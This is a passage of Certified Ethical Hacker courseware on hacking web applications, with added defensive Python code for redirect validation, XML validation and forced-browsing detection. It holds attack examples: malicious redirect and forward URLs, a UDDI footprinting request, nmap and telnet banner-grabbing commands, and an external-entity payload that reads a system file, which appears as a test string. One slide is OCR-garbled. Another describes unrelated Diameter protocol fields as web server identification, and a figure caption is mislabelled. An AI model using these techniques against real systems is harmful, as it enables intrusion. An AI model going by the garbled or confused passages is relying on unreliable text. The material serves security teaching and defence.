An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes. A session ID carried in the URL also leaks through browser history, proxy and server logs, bookmarks, and the Referer header sent to any third-party site linked from the page. Example:
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico

• 93. Timeout Exploitation
If an application's timeouts are not set properly and a user simply closes the browser without logging out from a site accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.

Password Exploitation
An attacker gains access to the web application's password database. If user passwords are stored in clear text, or are only weakly protected, the attacker can exploit every user's password.
  • 94. Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.

Unvalidated Redirect: The attacker sends the user an email containing a rewritten link to a malicious server, e.g. http://www.juggyboy.com/redirect.aspx?=http://www.evilserver.com. The user follows the link and is redirected to the attacker's server.

Unvalidated Forward: The attacker requests a page from the server with a forward parameter, e.g. http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp, and is forwarded to the Administration Page (Create price list, Create item listing, Purchase records, Registered users).

An attacker links to unvalidated redirects and lures the victim into clicking the link. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass, leading to:
- Session Fixation Attacks
- Security Management Exploits
- Failure to Restrict URL Access
- Malicious File Execution
  • 95. Figure 13.28: Unvalidated Redirects and Forwards. Left panel, "Unvalidated Redirect": the attacker sends the user an email containing a rewritten link to the malicious server (http://www.juggyboy.com/redirect.aspx?=http://www.evilserver.com) and the user is redirected to the attacker's server. Right panel, "Unvalidated Forward": the attacker requests http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp from the server and is forwarded to the Administration Page (Create price list, Create item listing, Purchase records, Registered users).
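The two diagrams above come down to one coding mistake: a client-supplied value is used as a redirect or forward target without validation. The following is an added example, not code from the CEH module: framework-independent Python handlers that return the target they would use, with the vulnerable form beside a hardened one. SITE_HOST and FORWARD_ALLOWLIST are assumptions for the module's fictitious juggyboy.com and juggyshop.com sites.

```python
"""Unvalidated redirect and forward: vulnerable handlers beside hardened ones.

Added example, not code from the CEH module. Each handler returns the
Location / forward target instead of sending it.
"""
from urllib.parse import urlsplit

SITE_HOST = "www.juggyboy.com"                      # assumed: our own host
FORWARD_ALLOWLIST = {"confirm.jsp", "receipt.jsp"}  # assumed: pages purchase.jsp may forward to
DEFAULT_LANDING = "/"


# --- Vulnerable: the client-supplied value is used as-is -----------------
def redirect_vulnerable(target_param):
    # redirect.aspx?=http://www.evilserver.com -> Location: http://www.evilserver.com
    return target_param


def forward_vulnerable(fwd_param):
    # purchase.jsp?fwd=admin.jsp -> server-side forward to admin.jsp, skipping
    # the access check a direct request for admin.jsp would have hit
    return fwd_param


# --- Hardened ------------------------------------------------------------
def is_local_path(target):
    """True only for a plain same-site path such as /account/orders."""
    if not target:
        return False
    # Tabs, newlines and other control characters are stripped by many URL
    # parsers (Python's included), which turns "/\t/evil.com" into "//evil.com".
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target) or "\\" in target:
        return False
    # Exactly one leading slash: "//evil.com" is scheme-relative, and browsers
    # treat "/\evil.com" the same way.
    if not target.startswith("/") or target.startswith("//"):
        return False
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def redirect_hardened(target_param, default=DEFAULT_LANDING):
    """Return a redirect target that stays on our site, else the default."""
    candidate = (target_param or "").strip()
    if is_local_path(candidate):
        return candidate
    try:
        parts = urlsplit(candidate)
    except ValueError:               # e.g. malformed IPv6 literal
        return default
    if (parts.scheme in ("http", "https")
            and parts.hostname == SITE_HOST
            and parts.username is None and parts.password is None):
        return candidate             # absolute URL to ourselves, no userinfo trick
    return default


def forward_hardened(fwd_param):
    """Only forward to pages explicitly allowed for this flow; None otherwise."""
    if fwd_param in FORWARD_ALLOWLIST:
        return fwd_param
    return None


if __name__ == "__main__":
    for t in ("http://www.evilserver.com", "//www.evilserver.com",
              "/account/orders", "https://www.juggyboy.com/account"):
        print(f"{t!r:40} vulnerable={redirect_vulnerable(t)!r} hardened={redirect_hardened(t)!r}")
    print("forward admin.jsp:", forward_vulnerable("admin.jsp"), forward_hardened("admin.jsp"))
```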
  • 96. Web Services Architecture

Figure 13.29: Web Services Architecture (layered diagram, bottom to top): HTTP, .Net TCP Channel, Fast InfoSet, etc.; XML, SOAP, WSDL, Schema, WS-Advertising, etc.; WS-Policy and WS Security Policy; XML Encryption and XML Digital Signatures; Security Token Profiles (SAML, Kerberos, X.509); WS-Security, WS-SecureConversation, WS-Federation and WS-Trust; WS-Work Processes.
  • 97. Web Services Attack

- Web services evolution and its increasing use in business offer new attack vectors in an application framework.
- Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services, all of which are vulnerable to various web application threats.

Web services are process-to-process communications that have special security issues and needs. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers alike to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is handed to the attacker.

It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:
- An attacker injects a malicious script into a web service, and is able to disclose and modify application data.
- An attacker using a web service for ordering products injects a script to reset the quantity and status on the confirmation page to less than what was originally ordered. In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.
  • 99. Web Services Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

XML Query:

POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 229

<?xml version="1.0" encoding="UTF-8" ?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
<Body>
<find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_business>
</Body>
</Envelope>

HTTP/1.1 100 Continue

XML Response:

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2004 10:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos><serviceInfo serviceKey="…" businessKey="…"><name xml:lang="en-us"> </name></serviceInfo> … four further serviceInfo entries of the same form … </serviceInfos></serviceList></soap:Body></soap:Envelope>

(The serviceKey and businessKey GUID values of the five serviceInfo entries are omitted here.)

Attackers use the Universal Business Registry (UBR) as a major source for gathering information on web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP, and it is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations usually use one of the following structures:
- Business Entity
- Business Service
- Binding Template
- Technical Model (tModel)

Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.
  • 100. Figure 13.30: Web Services Footprinting Attack (the XML query and XML response shown above: the find_business request to uddi.microsoft.com and the serviceList response).
  • 101. Web Services XML Poisoning

- Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in the XML parsing logic and break the execution logic.
- Attackers can manipulate XML external entity references, which can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks.
- XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.

XML Request:

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request:

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

XML poisoning is similar to a SQL injection attack, and it has a larger success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to alter parsing mechanisms like SAX and DOM that are used on the server. Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in the XML parsing logic and break the execution logic. Attackers can manipulate XML external entity references, which can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
  • 102. Figure 13.31: Web Services XML Poisoning (the XML request and poisoned XML request shown above).
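The poisoned CustomerRecord above is caught by a parser that insists on the expected document shape instead of taking the first or last value of a repeated node. The following is an added example, not code from the CEH module: a strict validator that rejects duplicated or unexpected elements, refuses documents carrying DTD or entity declarations (the vehicle for the external-entity and entity-expansion problems the slide mentions), and caps document and field sizes. It uses only the standard library; the EXPECTED_CHILDREN tuple and the size caps are assumptions standing in for a real XSD.

```python
"""Structural validation of a CustomerRecord SOAP payload.

Added example, not code from the CEH module. EXPECTED_CHILDREN and the
size caps are assumptions standing in for an XSD.
"""
import xml.etree.ElementTree as ET

EXPECTED_CHILDREN = ("CustomerNumber", "FirstName", "LastName",
                     "Address", "Email", "PhoneNumber")
MAX_DOC_BYTES = 16 * 1024        # assumed size cap for this message type
MAX_FIELD_CHARS = 256            # assumed per-field length cap


class PoisonedXML(ValueError):
    """Raised for any document that deviates from the expected shape."""


def parse_customer_record(raw):
    """Return the record as a dict, or raise PoisonedXML."""
    if isinstance(raw, str):
        raw = raw.encode("utf-8")
    if len(raw) > MAX_DOC_BYTES:
        raise PoisonedXML("document exceeds size limit")
    # Reject DTDs outright: entity declarations are what enable external
    # entity (file / TCP) access and entity-expansion denial of service.
    if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
        raise PoisonedXML("DTD or entity declaration not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise PoisonedXML(f"malformed XML: {exc}") from None
    if root.tag != "CustomerRecord" or root.attrib:
        raise PoisonedXML("unexpected root element or attributes")

    record = {}
    for child in root:
        if child.tag not in EXPECTED_CHILDREN:
            raise PoisonedXML(f"unexpected element <{child.tag}>")
        if child.tag in record:
            # the slide's poisoning: a second CustomerNumber / FirstName node
            raise PoisonedXML(f"duplicate element <{child.tag}>")
        if len(child) or child.attrib:
            raise PoisonedXML(f"<{child.tag}> must be a plain text node")
        text = (child.text or "").strip()
        if len(text) > MAX_FIELD_CHARS:
            raise PoisonedXML(f"<{child.tag}> too long")
        record[child.tag] = text

    missing = [t for t in EXPECTED_CHILDREN if t not in record]
    if missing:
        raise PoisonedXML(f"missing elements: {', '.join(missing)}")
    if not record["CustomerNumber"].isdigit() or not record["PhoneNumber"].isdigit():
        raise PoisonedXML("CustomerNumber and PhoneNumber must be numeric")
    return record


def is_valid_record(raw):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        parse_customer_record(raw)
        return True
    except PoisonedXML:
        return False


# The two documents from the slide.
GOOD_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

POISONED_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

# Constructed: the same record carrying an external entity declaration.
ENTITY_RECORD = """<?xml version="1.0"?>
<!DOCTYPE CustomerRecord [<!ENTITY ext SYSTEM "file:///etc/hostname">]>
<CustomerRecord><CustomerNumber>&ext;</CustomerNumber></CustomerRecord>"""

if __name__ == "__main__":
    for label, doc in (("good", GOOD_RECORD), ("poisoned", POISONED_RECORD),
                       ("entity", ENTITY_RECORD)):
        print(label, "accepted" if is_valid_record(doc) else "rejected")
```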
  • 103. Module Flow

So far, we have discussed web application components and the various threats associated with web applications. Now we will discuss the web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.

Module sections: Web App Concepts; Web App Threats; Hacking Methodology; Web Application Hacking Tools; Countermeasures; Security Tools; Web App Pen Testing.

This section gives a detailed explanation of the web application hacking methodology.
  • 104. Web App Hacking Methodology

In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.
  • 105. Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications.

- Server Discovery: Discover the physical servers that host the web application.
- Service Discovery: Discover the services running on web servers that can be exploited as attack paths for web app hacking.
- Server Identification: Grab server banners to identify the make and version of the web server software.
- Hidden Content Discovery: Extract content and functionality that is not directly linked or reachable from the main visible content.

Through web infrastructure footprinting, an attacker can perform:

Server Discovery: In server discovery, when there is an attempt to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-aware. Server discovery finds the physical servers that host the web application.

Service Discovery: Discovers the services running on web servers that can be exploited as attack paths for web app hacking. Service discovery searches a targeted application environment for loads and services automatically.

Server Identification: Grab the server banners to identify the make and version of the web server software. It consists of:
- Local Identity: This specifies the server Origin-Realm and Origin-Host.
- Local Addresses: These specify the local IP addresses of the server that are used for Diameter Capability Exchange messages (CER/CEA messages).
- Self-Names: This field specifies the realms to be considered local to the server; any request sent for these realms will be treated as if there were no realm in the request sent by the server.

Hidden Content Discovery: Extract content and functionality that is not directly linked or reachable from the main visible content.
  • 107. Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet.

- Whois lookup gives information about the IP address of the web server and DNS names. Whois Lookup Tools: http://www.whois.net, http://www.dnsstuff.com, http://www.tamos.com, http://netcraft.com
- DNS interrogation provides information about the location and type of servers. DNS Interrogation Tools: http://e-dns.org, http://www.domaintools.com, http://www.dnsstuff.com, http://network-tools.com
- Port scanning attempts to connect to a particular set of TCP or UDP ports to find out the services that exist on the server. Port Scanning Tools: Nmap, WhatsUp PortScanner Tool, NetScan Tools Pro, Hping

In order to footprint a web infrastructure, you first need to discover the active servers on the Internet. Server discovery gives information about the location of active servers on the Internet. Three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup: Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. It produces the result in the form of an HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup tools are:
- http://www.tamos.com
- http://netcraft.com
- http://www.whois.net
- http://www.dnsstuff.com

DNS Interrogation: DNS is a distributed database used by various organizations to connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching the attack on the target organization. DNS interrogation also provides information about the location and type of servers. Some of the tools are:
- http://www.dnsstuff.com
- http://network-tools.com
- http://e-dns.org
- http://www.domaintools.com

Port Scanning: Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intrude into the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the services that exist on the server. Some of the tools are:
- Nmap
- NetScan Tools Pro
- WhatsUp PortScanner Tool
- Hping
  • 109. Footprint Web Infrastructure: Service Discovery

Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. Service discovery searches a targeted application environment for loads and services automatically. The targeted server has to be scanned thoroughly so that the common ports used by web servers for different services can be identified. The table that follows lists the common ports used by web servers and the respective HTTP services:

Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
443     SSL (https)
900     IBM WebSphere administration client
2301    Compaq Insight Manager
2381    Compaq Insight Manager over SSL
4242    Microsoft Application Center Remote management
7001    BEA WebLogic
7002    BEA WebLogic over SSL
7070    Sun Java Web Server over SSL
8000    Alternate Web server, or Web cache
8001    Alternate Web server or management
8005    Apache Tomcat
9090    Sun Java Web Server admin module
10000   Netscape Administrator interface

Table 13.1: Service Discovery

You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser.

Source: http://nmap.org

Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also determine the different services running on the web server and give detailed information about the remote computers.

Figure 13.32: Zenmap tool screenshot (scan of google.com with the command "nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 google.com"; the Ports/Hosts tab lists 80/tcp open http, 113/tcp closed ident, and 443/tcp open https).
  • 111. Footprint Web Infrastructure: Server Identification / Banner Grabbing

- Analyze the server response header field to identify the make, model, and version of the web server software.
- This information helps attackers to select exploits from vulnerability databases to attack a web server and applications.

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

Banner grabbing tools: 1. Telnet  2. Netcat  3. ID Serve  4. Netcraft

Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select exploits from vulnerability databases to attack a web server and applications.

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

A banner can be grabbed with the help of tools such as:
- Telnet
- Netcat
- ID Serve
- Netcraft

These tools make banner grabbing and analysis an easy task.

Figure 13.33: Server Identification/Banner Grabbing. Server identified as Microsoft IIS from the following response:

HTTP/1.1 200 OK
Server:
Date: Thu, 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/
Via: 1.1 Application and Content Networking System Software 5.1.15
Connection: Close

Connection to host lost.
C:\>
  • 113. Exam 312-50Certified Ethical HackerEthical Hacking and C ounterm easures Hacking W eb A pplications F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n C o n t e n t D i s c o v e r y C E H J D isco ve r th e h id d e n c o n te n t a nd fu n c tio n a lity th a t is n o t re a ch a b le fro m th e m ain v is ib le c o n te n t to e x p lo it u se r p riv ile g e s w ith in th e a p p lic a tio n J It a llo w s an a tta c k e r to re c o v e r b a cku p copies o f live file s, c o n fig u ra tio n file s and log file s c o n ta in in g s e n sitive d a ta , ba cku p a rch ive s c o n ta in in g sn a p sh o ts o f file s w ith in th e w e b ro o t, n e w fu n c tio n a lity w h ic h is n o t linked to th e m a in a p p lic a tio n , etc. e Use a u to m a tio n to o ls such as Burp suite to make huge num bers o f requests to th e w e b server in o rd e r to guess th e nam es o r id e n tifie rs o f hidden co n te n t and fu n c tio n a lity Attacker-Directed Spidering Attacker accesses all o f the application's functionality and uses an intercepting proxy to m o n ito r all requests and responses The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers Tool: OWASP Zed A tta ck Proxy © W eb spiders a u to m a tica lly d isco ve r th e hid d e n c o n te n t and fu n c tio n a lity by parsing HTML fo rm and client-side JavaScript requests and responses © W eb S p iderin g Tools: S OWASP Zed A tta ck Proxy S Burp S pider - W ebS carab Copyright © by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n C o n t e n t D i s c o v e r y Crucial in fo rm a tio n related to th e business such as prices o f products, discounts, login IDs, and passwords is ke pt secret. This in fo rm a tio n is usually n o t visible to outsiders. This in fo rm a tio n is usually stored in hidden fo rm fields. 
Discover th e hidden c o n te n t and fu n c tio n a lity th a t is n ot reachable fro m th e m ain visible c o n te n t to e xploit user privileges w ith in th e application. This allow s an a tta cker to recover backup copies o f live files, c o n fig u ra tio n files, and log files c o nta ining sensitive data, backup archives co nta ining snapshots o f files w ith in th e w e b roo t, n ew fu n c tio n a lity th a t is n ot linked to th e m ain application, etc. These hidden fields can be d e te rm in e d w ith th e help o f th re e techniques. They are: W e b S p i d e r i n g W e b spiders a u to m a tic a lly discover hidden c o n te n t and fu n c tio n a lity by parsing HTML fo rm s and client-side JavaScript requests and responses. Tools th a t can be used to discover th e hidden c o n te n t by m eans o f w e b sp id e rin g include: Q OWASP Zed A ttack Proxy Q Burp Spider © W ebScarab Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. R eproduction is Strictly Prohibited. M odule 13Page 1835
• 114. Attacker-Directed Spidering
An attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy, can also be used for attacker-directed spidering.

Brute Forcing
Brute forcing is a very popular and easy method of attacking web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
• 115. Web Spidering Using Burp Suite
[Screenshot: Burp Suite Intruder showing a captured request and the attack results window]
Source: http://www.portswigger.net

Web Spidering Using Burp Suite
Source: http://www.portswigger.net
Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. Web spidering using Burp Suite is done in the following manner:
1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
• 116. 5. Continue these steps recursively until no further content or functionality is identified
[Screenshot: Burp Suite Free Edition v1.4.01 Intruder attack results, showing the payload positions and the request/response for each payload]
FIGURE 13.34: Server Identification/Banner Grabbing
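Seen from the server side, the spidering and name-guessing activity described on the hidden content discovery and Burp spidering slides leaves a characteristic trace in the access log. The following added example (not part of the EC-Council courseware) flags clients that request many distinct, mostly non-existent paths in a short window; it assumes Common Log Format lines, and every log line and IP address in it is constructed.

```python
"""Flag hidden-content guessing (forced browsing) in an access log.

Added example, not EC-Council courseware. Assumes Common Log Format lines;
every log line and address below is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format: ip ident user [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_forced_browsing(lines, window=timedelta(seconds=60),
                         min_requests=20, min_404_ratio=0.6):
    """Return {ip: stats} for clients whose request burst looks like name
    guessing: at least `min_requests` requests inside one `window`, most of
    them answered 404.  A spider that only follows real links produces few
    404s; a guesser produces mostly 404s with a handful of hits."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # slide the window start forward until it spans at most `window`
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            span = recs[start:end + 1]
            if len(span) < min_requests:
                continue
            not_found = sum(1 for r in span if r["status"] == 404)
            if not_found / len(span) < min_404_ratio:
                continue
            stats = {
                "requests": len(span),
                "not_found": not_found,
                "distinct_paths": len({r["path"] for r in span}),
                "hits": sorted(r["path"] for r in span if r["status"] == 200),
            }
            # keep the largest qualifying window for this client
            if ip not in flagged or stats["requests"] > flagged[ip]["requests"]:
                flagged[ip] = stats
    return flagged


def _line(ip, second, path, status):
    """Build one constructed CLF line at 13:55:<second>."""
    return (f'{ip} - - [10/Oct/2012:13:55:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512')


# Constructed sample: a normal visitor following links, and a client that
# guesses backup-file names in a burst (22 misses, 3 hits within 30 seconds).
SAMPLE_LOG = [_line("203.0.113.5", s, p, 200) for s, p in
              enumerate(["/", "/index.html", "/products", "/cart", "/checkout"])]
SAMPLE_LOG += [_line("198.51.100.7", i, f"/page{i}.bak", 404) for i in range(22)]
SAMPLE_LOG += [_line("198.51.100.7", 30, p, 200)
               for p in ["/", "/admin/", "/backup/"]]

if __name__ == "__main__":
    for ip, stats in find_forced_browsing(SAMPLE_LOG).items():
        print(ip, stats)
```

The `hits` list is the useful output for response: it names the unlinked content the guesser actually found, which is what should be reviewed or removed from the web root.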
• 117. Web Spidering Using Mozenda Web Agent Builder
Mozenda Web Agent Builder crawls through a website and harvests pages of information.

Web Spidering Using Mozenda Web Agent Builder
Source: http://www.mozenda.com
Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.
• 118. [Screenshot: Mozenda Web Agent Builder capturing product review items (item name, price, rating, review, would-recommend) from a web page]
FIGURE 13.35: Web Spidering Using Mozenda Web Agent Builder
• 119. Web App Hacking Methodology: Attack Web Servers
(Methodology stage diagram: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services)
Once you conduct full-scope footprinting of the web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack the web servers using the various techniques available. Each and every website or web application is associated with a web server that hosts the code serving that website or web application. The attacker exploits the vulnerabilities in that code and launches attacks on the web server. Detailed information about hacking web servers is given on the following slides.
• 120. Hacking Web Servers
Once the attacker identifies the web server environment, he or she scans for known vulnerabilities using a web server vulnerability scanner. Vulnerability scanning helps the attacker launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on a vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.
• 121. Web Server Hacking Tool: WebInspect
- WebInspect identifies security vulnerabilities in web applications
- It runs interactive scans using a sophisticated user interface
- An attacker can exploit identified vulnerabilities to carry out web services attacks
https://download.hpsmartupdate.com

Web Server Hacking Tool: WebInspect
Source: https://download.hpsmartupdate.com
WebInspect is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities to launch web services attacks.
• 122. [Screenshot: WebInspect scan results window]
FIGURE 13.36: WebInspect Tool Screenshot
• 123. Web App Hacking Methodology: Analyze Web Applications
Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points for breaking into it is discussed on the following slides.
• 124. Analyze Web Applications
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.
- Identify Entry Points for User Input: review the generated HTTP requests to identify the input entry points
- Identify Server-Side Functionality: observe the applications revealed to the client to identify the server-side structure and functionality
- Identify Server-Side Technologies: fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting
- Map the Attack Surface: identify the various attack surfaces uncovered by the applications and the vulnerabilities associated with each one

Analyze Web Applications
Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge of the web application, and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input
The entry points of an application also serve as entry points for attacks; they include the front-end web application that listens for HTTP requests. Review the generated HTTP requests to identify the user input entry points.

Identify Server-Side Functionality
Server-side functionality refers to the ability of a server to execute programs that produce the web pages it outputs. These are scripts that reside on particular web servers and allow interactive web pages or websites to run there. Observe the applications revealed to the client to identify the server-side structure and functionality.

Identify Server-Side Technologies
Server-side technologies, or server-side scripting, refer to the dynamic generation of web pages served by web servers, as opposed to static web pages that are stored on the server and served to web browsers unchanged. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.
• 125. Map the Attack Surface
Identify the various attack surfaces uncovered by the applications and the vulnerabilities associated with each one.
• 126. Analyze Web Applications: Identify Entry Points for User Input
- Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields
- Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers
- Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL
- Tools used: Burp Suite, httprint, WebScarab, OWASP Zed Attack Proxy

Analyze Web Applications: Identify Entry Points for User Input
During web application analysis, attackers identify entry points for user input so that they can understand how the web application accepts or handles user input. The attacker then tries to find vulnerabilities in the input-handling mechanism and to exploit them in order to interact with or gain access to the web application.
